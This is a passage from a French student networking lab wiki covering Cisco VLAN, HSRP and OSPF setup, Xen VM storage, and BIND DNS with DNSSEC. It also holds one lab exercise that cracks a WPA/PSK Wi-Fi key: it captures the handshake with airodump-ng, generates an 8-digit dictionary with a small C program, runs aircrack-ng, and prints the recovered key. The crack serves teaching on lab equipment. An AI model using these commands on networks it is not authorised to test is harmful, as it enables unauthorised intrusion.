 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
